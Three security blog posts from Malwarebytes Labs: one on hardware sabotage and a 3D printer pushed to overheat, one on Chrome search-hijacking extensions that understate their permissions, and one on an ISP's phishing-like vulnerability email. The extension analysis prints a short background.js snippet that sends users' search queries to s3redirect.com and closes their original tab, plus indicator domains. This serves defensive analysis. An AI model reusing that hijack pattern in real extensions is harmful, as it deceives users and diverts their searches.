Has blasting apart your computer “like a large hand grenade” ever been so much fun? Would it only be a little bit terrifying if the hand grenade was incredibly small? How many decently-sized grenades does it take to make your computer explode like a bomb, anyway? Is the bomb also incredibly large? What kind of power are we talking here, because it would frankly be anti-climatic if it turns out to be a hoax.

Maybe the real grenades were the bombs we made along the way

However you stack it up, the antics of highly combustible cyber assassins are often overplayed for dramatic effect. At this point I’d like to ask, “Who remembers the terrible Y2k trend of exploding computers?” but as you’re aware, that didn’t actually end up happening. Lots of hard-working people spent an incredible amount of time ensuring the Millennium bug didn’t cause Millennium-bug related problems, but I don’t think they were thinking of dramatic explosions when they were doing so.

Still, there’s always been a way to affect hardware in (significantly less spectacular) ways, though most of them seem to be a combination of user error or tinkering with hardware hacks. Even the article above mentions someone claiming to make one of these start smoking by writing programs which toggled the cassette relay switch rapidly. I, myself, once woke up to a PC on fire (and I do mean on fire) after something broke overnight and I was met with the smell of metal burning, plastic melting, and an immediate concern related to not having the house burn down around me.

Evil cyber assassins making you explode, though?

Not that common, sorry. However, there has been the occasional bad event down the years where hardware was specifically targeted in frankly terrifying ways. 

Breaking hardware for fun, profit, and confusion

Before we set down some of the most common techniques hardware can be impacted in ways they probably shouldn’t be, we’ll set the bar early and highlight what’s likely the biggest, baddest example of hardware tampering. Stuxnet, a worm targeting SCADA systems, caused large amounts of damage at a nuclear facility in Iran between 2009/10. It did this by speeding up, slowing down, and then speeding up centrifuges till they were unable to cope and broke. Up to 1,000 centrifuges were taken down as a result of the attack [PDF]. This is an assault which clearly took an incredible amount of planning and prep-work to pull off, and you’ll see the phrase “Nation state attack” an awful lot if you go digging into it.

This is, without a doubt, the benchmark for dragging digital attacks into real-world impact. A close runner-up would be 2017s Wannacry attack which impacted the NHS [PDF]. The key difference is that the plant in Natanz was deliberately targeted, and the infection had specific instructions for a specific task related to the centrifuges. The NHS was “simply” caught in the fallout, and not targeted specifically.

Attacks on people at home, or smaller organisations, tend to be on a much smaller scale. The idea isn’t really to break the hardware beyond repair to make some sort of statement; the device is useful because they can keep on using it. Even so, the impact can range from “mild inconvenience” to “potentially life threatening”. 

What’s mining is mine

You could end up with a higher electricity bill than normal should you find some Bitcoin miners hiding under the hood. This might keep you warm on a chilly winter evening, but it’s not particularly advisable for financial outlay or individual PC parts. The problem with your standard Bitcoin miner placed on a system without permission is the resources they gobble up for computations. They love those big, juicy graphics cards for maximum money-making.

Having said that, your child’s middle-range gaming laptop is also a perfectly acceptable target for them. If the cooling fans are going haywire even when no game is running, it might be time to start running some scans. Overheating can be mitigated on desktops unless they’re clogged up with a lot of dust or faulty parts, but the margin for error is a lot smaller with a laptop. All that heat built up in one siginificantly smaller space over time isn’t great, and while toasting the machine wouldn’t be part of the Bitcoin miner’s gameplan, it’s one side-effect to be wary of.

On the flipside, modern systems are actually pretty good at combating heat…especially if you’re even a little bit into gaming. The reason you don’t see stories in the news about evil hackers melting computers is that a) it is, again, ultimately pointless b) it would be pretty difficult to pull off. Hardware comes with all sorts of failsafes, temperature sensors, shutdown routines, power spike protection, and much more. It would mean significant amounts of time and effort, in the vague hope you end up with something a little more impressive than “The PC shut down to prevent damage and it’s fine”.

BIOs / firmware hacks

Could you bludgeon your way into the very innards of the PC, and force it to do all sorts of terrible things? Perhaps. As with a lot of these scenarios, it typically relies on multiple steps and one specific target in mind. Malicious firmware is a possibility, but you’ll need to set the risk besides the likelihood of this happening. Once more, we see the inherent drawback in “make thing go boom”, or even just bricking the machine forever so it’s unusable. Having someone go to these lengths to attack your PC in this way is probably outside your threat model.

Not impossible, but unlikely. Somebody doing the above wants your data, not your laptop on fire. As a result, you absolutely should be cautious when in a place that isn’t your home.

IoT compromise

The world is filled with cheap, poorly secured bits of technology filling up our homes. Security is an afterthought, and even where it isn’t, bad things can still happen. At the absolute opposite end of pretend hackers turning your computer into a bomb, are the people whose sole intention is to compromise devices and live on them for as long as possible. Information, and control, are the two key currencies for domestic abusers implanting hacks into hardware.

Awfully bad, but awfully rare

These are all awful things, in various steep degrees of severity. They tamper with systems and processes in ways which can directly impact the physical operation of a device, or do it in a manner which leaves the object intact but causes trouble in the real world in other, less incendiary ways.

In terms of making things blow up, bomb style, we’re still at a bit of a loss.

All the same: there is a genuine threat aspect to all this, as we’re about to find out.

Strap yourself in and command the DeLorean as we jump from a Register article back in July 2000, to another one along similar lines at the tail end of July, 2020. Despite the warnings, it’s now 20 years on where we’re finally at the point where something a bit like your PC could go kaboom.

The entity known as time comes crashing through the window, reminding me of my melted and very much ablaze PC from about fourteen years ago. Your devices can and do catch fire for a variety of reasons, and they don’t have to be related to hacking.

In the case of a 3D printer enthusiast who found their device bellowing smoke, the likely culprit was a loose heating element and a bit of bad luck to set everything ablaze. Note that the post-incident assessment includes a rework of the physical space around the device. Everything from storage to safety equipment is now considered, to combat (as they put it), the placement of a heavy-duty bit of kit inside a “burn-my-house-down box”.

This is similar to ensuring the space around a VR gaming setup is also secured, in terms of mats on the floor so you know when you’ve wandered out of the safety zone, wires suspended by the ceiling, no sharp / dangerous items nearby and so on. Sadly, people don’t consider the ways in which physical danger presents itself via digital devices.

Keep all of this in mind, when checking out what comes next.

What comes next, is a 3D printer modified with the intention of seeing if it’s possible to “weaponize this 3D printer into a firebomb”.

Weaponizing a 3D printer into a firebomb?

Researchers at Coalfire toiled hard at creating a hand-crafted method to alter the way a specific 3D printer operates and have it hit increasingly dangerous temperatures. In their final bout of testing, the smoke and fumes were so bad in an outdoor location that they couldn’t be closer than 6ft from the smouldering device.

This is, of course, an incredibly bad situation to be in. However, there are some big caveats attached to this one in terms of threat. All 3D printers are a potential fire risk, because they naturally enough involve activities requiring high temperatures. If you leave them alone…and you really shouldn’t…you could end up with the aforementioned burn-my-house-down box. There are also emissions to consider.

In my former life as an artist, I did a lot of work around the old-style MDF which contained all manner of bad things if you cut into it and precautions had to be taken. Similarly, you have to pay attention to what may be wafting out of your printer.

I’ve dabbled in 3D printing a little bit, and the technology encourages me to treat it with a healthy bit of respect on account of how deadly it could be by default, with no tampering required, simply via me getting something wrong.

A good approach generally, I find.

Of worst case scenarios

We don’t know for sure how bad the smoking printer would’ve ended up, given the switch-off when the fumes became too much. A total meltdown seems likely, but a “bomb” as such probably won’t be the case.

This also isn’t something you can casually throw together at the drop of a hat. It’s not one short blog post showing how easy it is; it’s 3 posts of trying an awful lot of things out. Rooting the printer and cracking passwords, digging into board architecture, installing NSA tools to explore functions. Much more.

Creating extra space to house the new code, adjusting the max temperature variable then having to figure out how to bypass the error protection closing down any overenthusiastic temperature increases.

Much, much more.

Note also that to force the device to overheat beyond the safe “cut out” point, they had to replace the power supply with something bigger to achieve the required cookout levels.

It’s an awful lot of work to set your printer on fire. Of course, one worry might be a situation where the modified code is somehow pushed to device owners after some sort of compromise. You could also perhaps send people the rogue code directly as a supposed “update” and let them do the hard work.

One way around this is signed code from the vendor, though there’s usually resistance to that from some folks in maker circles because of issues related to planned obsolescence. Additionally, some prefer to download updates directly from the manufacturer’s website and aren’t keen on auto-updates for their printing tools.

Even so: regardless of the issues surrounding who wants which type of update, or if signed code would fix things or bring unforeseen hassles for the end-user, somebody compromising you remotely with this in some way would still need you to have switched out for a bigger power supply for the big boom.

That’s not very likely.

Hackers: they’ll turn your printer into a BOMB!

For the time being, your printer is (probably) not going to fulfil the prophesied digital cyber-grenade of lore. You’ve got more than enough to be getting on with where basic precautions are concerned, never mind worrying about someone blowing up your house with a toaster or USB headphones.

Treat your 3D printer with respect, follow the safety guidelines for your device, and never, ever leave it running and unattended. You don’t want to end up on the front page of the Weekly World News in 2040.

The post Explosive technology and 3D printers: a history of deadly devices appeared first on Malwarebytes Labs.

Chrome extensions that lie about their permissions

“But I checked the permissions before I installed this pop-up-blocker—it said nothing about changing my searches,” my dad retorts after I scold him for installing yet another search-hijacking Chrome extension. Granted, they are not hard to remove, but having to do it over and over is a nuisance. This is especially true because it can be hard to find out which of the Chrome extensions is the culprit if the browser starts acting up.

What happened?

Recently, we came across a family of search hijackers that are deceptive about the permissions they are going to use in their install prompt. This extension, called PopStop, claims it can only read your browsing history. Seems harmless enough, right?

PopStop install message

The install prompt in the webstore is supposed to give you accurate information about the permissions the extension you are about to install requires. It already is habit for browser extensions to only ask for permissions needed to function properly up front—then ask for additional permissions later on after installing. Why? Users are more likely to trust an extension with limited warnings or when permissions are explained to them.

But what is the use of these informative prompts if they only give you half the story? In this case, the PopStop extension doesn’t just read your browsing history, as the pop-up explains, but it also hijacks your search results.

Some of these extensions are more straightforward once the user installs them and they are listed under the installed extensions.

Niux APP extension

But others are consistent in their lies even after they have been installed, which makes it even harder to find out which one is responsible for the search hijack.

PopStop extension

How is this possible?

Google had at some point decided to bar extensions that obfuscate their code. By doing so, it’s easier for them to read the plug-in’s programming and conduct appropriate analysis.

The first step in determining what an extension is up to is in looking at the manifest.json file.

manifest.json

Registering a script in the manifest tells the extension which file to reference, and, optionally, how that file should behave.

What this manifest tells us is that the only active script is “background.js” and the declared permissions are “tabs” and “storage”. More about those permissions later on.

The relevant parts in background.js are these pieces, because they show us where our searches are going:

const BASE_DOMAIN = 's3redirect.com', pid = 9126, ver = 401;
chrome.tabs.create({url: `https://${BASE_DOMAIN}/chrome3.php?q=${searchQuery}`});
        setTimeout(() => {
          chrome.tabs.remove(currentTabId);
        }, 10);

This script uses two chrome.tabs methods: One to create a new tab based on your search query, and the other to close the current tab. The closed tab would have displayed the search results from your default search provider.

Looking at the chrome.tabs API, we read:

“You can use most chrome.tabs methods and events without declaring any permissions in the extension’s manifest file. However, if you require access to the url, pendingUrl, title, or favIconUrl properties of tabs.Tab, you must declare the “tabs” permission in the manifest.”

And indeed, in the manifest of this extension we found:

"permissions": [ "tabs", "storage" ],

The “storage” permission does not invoke a message in the warning screen users see when they install an extension. The “tabs” permission is the reason for the “Read your browsing history” message. Although the chrome.tabs API might be used for different reasons, it can also be used to see the URL that is associated with every newly-opened tab.

The extensions we found managed to avoid having to display the message, “Read and change all your data on the websites you visit” that would be associated with the “tabCapture” method. They did this by closing the current tab after capturing your search term and opening a new tab to perform the search for that term on their own site.

The “normal” permission warnings for a search hijacker would look more similar to this:

warning1 ConvertrSearch

The end effect is the same, but an experienced user would be less likely to install this last extension, as they would either balk at the permission request or recognize the plug-in as a search hijacker by looking at these messages.

Are these extensions really lying?

Some might call it a lie. Some may say no, they simply didn’t offer the whole truth. However, the point of those permissions pop-ups is to give users the choice on whether to download a program by being upfront about what that program asks of its users.

In the case of these Chrome extensions, then, let’s just say that they’re not disclosing the full extent of the consequences of installing their extensions.

It might be desirable if Google were to add a possible message for extensions that use the chrome.tabs.create method. This would inform the user that his extension will be able to open new tabs, which is one way of showing advertisements so users would be made aware of this possibility. And chrome.tabs.create also happens to be the method that this extension uses to replace the search results we were after with their own.

An additional advantage for these extensions is the fact that they don’t get mentioned in the settings menu as a “regular” search hijacker would.

searchsettings
A search hijacker that replaces your default search engine would be listed under Settings > Search engine

Not being listed as the search engine replacement, again, makes it harder for a user to figure out which extension might be responsible for the unexpected search results.

For the moment, these hijackers can be recognized by the new header they add to their search results, which looks like this:

search header

This will probably change once their current domains are flagged as landing pages for hijackers, and new extensions will be created using other landing pages.

Further details

These extensions intercept search results from these domains:

  • aliexpress.com
  • booking.com
  • all google domains
  • ask.com
  • ecosia.org
  • bing.com
  • yahoo.com
  • mysearch.com
  • duckduckgo.com

It also intercepts all queries that contain the string “spalp2020”. This is probably because that string is a common factor in the installer url’s that belong to the powerapp.download family of hijackers.

spapl2020

Search hijackers

We have written before about the interests of shady developers in the billion-dollar search industry and reported on the different tactics these developers resort to in order to get users to install their extensions or use their search sites[1],[2],[3].

While this family doesn’t use the most deceptive marketing practices out there, it still hides its bad behavior in plain sight. Many users have learned to read the install prompt messages carefully to determine whether an extension is safe. It’s disappointing that developers can evade giving honest information and that these extensions make their way into the webstore over and again.

IOC’s

extension identifiers:

pcocncapgaibfcjmkkalopefmmceflnh

dpnebmclcgcbggnhicpocghdhjmdgklf

search domains:

s3redirect.com

s3arch.page

gooogle.page <= note the extra “o”

Malwarebytes detects these extension under the detection name PUP.Optional.SearchEngineHijack.Generic.

Stay safe, everyone!

The post Chrome extensions that lie about their permissions appeared first on Malwarebytes Labs.

Dutch ISP Ziggo demonstrates how not to inform your customers about a security flaw

“Can you have a look at this email I got, please?” my brother asked. “It looks convincing enough, but I don’t trust it,” he added and forwarded me the email he received from Ziggo, his Internet Service Provider (ISP). Shortly after, he informed me that despite its suspicious aura, he found confirmation that the email was, in fact, legitimate.

In the suspect email, the Dutch ISP informed customers that an expert had found a weakness in the “Wifibooster Ziggo C7,” a device they sell to strengthen WiFi signals. Ziggo told users how to recognize this equipment, and urged them to change the default password and settings.

So what’s the problem? Alerting customers about a security flaw is best practice, is it not? Absolutely. But when your email alert about a security vulnerability looks like a phish itself, it’s time to reevaluate your email marketing strategy.

In this blog, I’ll break down what exactly happened with Ziggo, the flaws in their email communication, and how organizations should approach informing their employees and customers about potential security issues—without looking like a phishing scam.

What exactly happened?

Dutch ISP Ziggo sent out an email to their customers warning about a security weakness in a specific device that they sell to their customers. I translated the relevant parts of the mail from Dutch below:

“Dear Mister Arntz,

To keep our network safe, experts are looking for weak spots. Unfortunately, such a weakness was found in the Wifibooster Ziggo C7. You can recognize the device by the ‘C7’ mark at the bottom. This email is about this device and this type only.

Do you indeed use the Wifibooster Ziggo C7? In that case change the default settings in your personal settings to keep your device safe. Below we will explain how.

How to change your password

To make the chance of abuse as small as possible, it’s necessary to change your password. Go to link to Ziggo site, follow the instructions there and use a strong password.

Want to know more or need help?

Follow the link to the Ziggo forum where you can find more information about this subject and ask for help from the community members.”

This vague, unhelpful, and frankly dangerous advice was followed by a footer that contained nine more links, including (ironically enough) an anti-phishing warning.

What made the email look spammy?

We have spent years training people to recognize spam emails, and it is gratifying when our efforts pay off on occasion. The things my brother mentioned he found to be spammy were all the weird looking links in the email and the fact that he did not own the device that was the subject of the email.

I would like to add that the email mentioned a security weakness but did not specify which one. Also, the urge to change your password to avoid danger would be a dead give-away in a phishing mail.

So, we’ve got:

  • Subject does not apply directly to all receivers. Not every addressee had said device. When asked Ziggo stated they wanted to make sure that users that bought the device second-hand would be aware of the issue too.
  • A multitude of links that looked phishy probably because they were personalized.
phishy looking link
  • Urging receivers to go to a site and take precautions against an unclear threat.

The device

The Wifibooster Ziggo C7 is in fact a TP-Link Archer C7 that Ziggo sells to their customers with their own firmware installed. Therefore, it is hard to find any information about what the vulnerability might be. The Archer C7 is listed as affected by the WPA2 Security (KRACKs) vulnerability for certain firmware versions. But given the Ziggo device comes with custom firmware, it is hard to determine whether the Wifibooster Ziggo C7 is vulnerable as well.

Based on the fact that users are urged to change their wifi-passwords and the name of the network (SSID) and looking at the instructions we found on the site we are inclined to conclude that the device was shipped with default credentials, which might help attackers to exploit a remote acces vulnerability.

The possible danger

Ziggo warned the users that not following their instructions could lead to unauthorized access to their network.

We asked our resident hardware guru JP Taggart about this scenario and he was very weary about ISPs that put more than some branding deviations of the manufacturer’s firmware on the device. Once you start to drift away from the standard firmware you are responsible for maintaining and patching that firmware, because the manufacturer will no longer be able to or even want to. We have looked at some existing vulnerabilities for the Archer C7 but they are old and if they would apply it couldn’t be cured by changing the password and SSID.

ISPs make a habit of branding the firmware for the equipment they sell to their customers. Logic dictates that the security flaw must have been in this branded firmware, since we could not find any other recent warning about this particular type of device. Which would demonstrate JP Taggarts’ comment about the dangers of branded firmware.

What Ziggo could have done better

The most objectional part of the method Ziggo chose to inform is the phishy looking format they constructed their email in. The more companies do this, the harder it is for us to tell the real phishes apart from the legitimate emails. To be honest, some of the more sophisticated phishers have produced emails that looked less phishy than this one.

They also could have been a lot more open about the security flaw that was found. Of course we don’t expect them to post a full hackers guide on how to use an exploit and spy on your neighbor, but a little bit of concrete information on what was found and how that could be exploited would have made sense.

For the instructions of how to change the settings I would have found it preferable to list the basic steps in the email and include a link for those that need further or more detailed instructions. All the relevant and necessary information should have been in the mail and not been linked to. Links are fine, but not for crucial information.

During the installation of such a device the ISP should force the user to change the default password at least, and probably advise them to change the SSID as well. A default SSID tells an aspiring hacker which ISP you are using and they can make some informed guesses at which equipment you are using etc.

The danger of sending out phishy emails

Invested parties may have deleted the mail at first sight and never changed their password, making them vulnerable to the ‘flaw”.

Or, as our own William Tsing wrote in an older post called When corporate communications look like a phish:

“Essentially, well-meaning communications with these design flaws train an overloaded employee to exhibit bad behaviors—despite anti-phishing training—and discourage seeking help.”

This is also true for the home user that may not receive as many emails at home as an office employee does (120), but the ones that do receive a lot of mail, have trained themselves to recognize the emails that are important and ignore the rest. Which would be a shame if the included information is as important as the ISP wants us to believe.

Stay safe, everyone!

The post Dutch ISP Ziggo demonstrates how not to inform your customers about a security flaw appeared first on Malwarebytes Labs.